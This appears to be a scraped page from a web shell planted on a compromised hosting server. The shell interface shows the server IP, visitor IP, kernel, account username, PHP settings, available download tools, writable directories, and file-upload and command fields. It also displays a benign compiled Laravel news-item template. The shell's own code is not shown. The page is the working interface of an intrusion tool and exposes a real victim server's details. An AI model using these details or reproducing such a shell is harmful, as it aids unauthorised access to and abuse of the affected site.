Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.137.162.107
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/storage/framework/views/294cf81abfce98fcbe928a1bac76fee2cfaa880e.php
<?php
    $translation = $row->translateOrOrigin(app()->getLocale());
?>
<div class="item-news">
    <div class="thumb-image">
        <a href="<?php echo e($row->getDetailUrl()); ?>">
            <?php if($row->image_id): ?>
                <?php if(!empty($disable_lazyload)): ?>
                    <img src="<?php echo e(get_file_url($row->image_id,'medium')); ?>" class="img-responsive" alt="<?php echo e($translation->name ?? ''); ?>">
                <?php else: ?>
                    <?php echo get_image_tag($row->image_id,'medium',['class'=>'img-responsive','alt'=>$row->title]); ?>

                <?php endif; ?>
            <?php endif; ?>
        </a>
    </div>
    <div class="caption">
        <div class="item-date">
            <ul>
                <?php $category = $row->getCategory; ?>
                <?php if(!empty($category)): ?>
                    <?php $t = $category->translateOrOrigin(app()->getLocale()); ?>
                    <li>
                        <a href="<?php echo e($category->getDetailUrl(app()->getLocale())); ?>">
                            <?php echo e($t->name ?? ''); ?>

                        </a>
                    </li>
                <?php endif; ?>
                <li class="dot"> <?php echo e(display_date($row->updated_at)); ?>  </li>
            </ul>
        </div>
        <h3 class="item-title"><a href="<?php echo e($row->getDetailUrl()); ?>"> <?php echo clean($translation->title); ?> </a></h3>
        <div class="item-desc">
            <?php echo get_exceprt($translation->content,70,"..."); ?>

        </div>
        <div class="item-more">
            <a class="btn-readmore" href="<?php echo e($row->getDetailUrl()); ?>"><?php echo e(__('Read More')); ?></a>
        </div>
    </div>
</div><?php /**PATH /home/book24/public_html/modules/News/Views/frontend/blocks/list-news/loop.blade.php ENDPATH**/ ?>

Youez - 2016 - github.com/yon3zu
LinuXploit